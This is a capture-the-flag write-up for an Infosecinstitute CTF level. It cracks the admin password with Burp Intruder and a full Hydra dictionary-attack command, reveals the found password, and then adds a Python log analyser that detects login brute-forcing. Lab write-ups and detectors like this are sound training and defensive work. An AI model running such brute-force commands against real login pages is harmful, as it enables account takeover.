Infosecinstitute | CTF2

Level 12 | Dictionary Attack

Your task is to crack the password of the user called admin. Use whatever tool you like but we would recommend entering Google and searching for filetype:lst password in order to perform a dictionary attack.

Target:

Tools:

  • Firefox
  • BurpSuite
  • Hydra

Using BurpSuite

Intercept the request

Send the request to Intruder, then mark the password field as the payload position.

Add the password list to BurpSuite, then launch the attack.

Check for a response whose page size differs from the rest; it was the one for the password princess.

Now let's log in with:

Username: admin
Password: princess


Using Hydra

hydra -l admin -P /home/pentest/wordlists/passwords.lst ctf.infosecinstitute.com http-post-form "/ctf2/exercises/ex12.php:username=admin&password=^PASS^&logIn=Login:Incorrect username or password combination"

Done!
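
What this attack looks like from the server side, as an added example that is not part of the original write-up: it flags a client that sends a burst of POSTs to the login form and lists any response whose size differs from the usual failure page, the same signal used in the Intruder step above. The combined log format, the IP addresses, the response sizes and the threshold are assumptions made for this example.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

LOGIN_PATH = "/ctf2/exercises/ex12.php"  # form path taken from the Hydra command
# Combined log format: client, timestamp, method, path, status, response bytes.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" \d{3} (?P<size>\d+)'
)

def make_sample_log():
    """Constructed log: 12 guesses from one client (the 9th gets a different size) and one normal login."""
    lines = [
        f'203.0.113.7 - - [01/Jan/2015:10:00:{i:02d} +0000] "POST {LOGIN_PATH} HTTP/1.1" '
        f'200 {2304 if i == 8 else 2211} "-" "-"'
        for i in range(12)
    ]
    lines.append(f'198.51.100.4 - - [01/Jan/2015:10:00:05 +0000] "POST {LOGIN_PATH} HTTP/1.1" 200 2211 "-" "-"')
    return lines

def detect_dictionary_attack(lines, threshold=10, window=timedelta(seconds=60)):
    """Return one finding per client with >= threshold login POSTs inside any sliding window."""
    posts = defaultdict(list)  # ip -> [(time, response size)]
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or m["path"].split("?")[0] != LOGIN_PATH:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        posts[m["ip"]].append((ts, int(m["size"])))
    findings = []
    for ip, events in posts.items():
        events.sort()
        start = peak = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        # The failure page dominates; a different size may mean one guess succeeded.
        baseline = Counter(size for _, size in events).most_common(1)[0][0]
        odd = [ts.isoformat() for ts, size in events if size != baseline]
        findings.append({"ip": ip, "peak": peak, "baseline_size": baseline, "possible_success_at": odd})
    return findings

if __name__ == "__main__":
    print(detect_dictionary_attack(make_sample_log()))
```

A finding with a non-empty possible_success_at list means the account should be treated as compromised and its password reset, not just the source blocked.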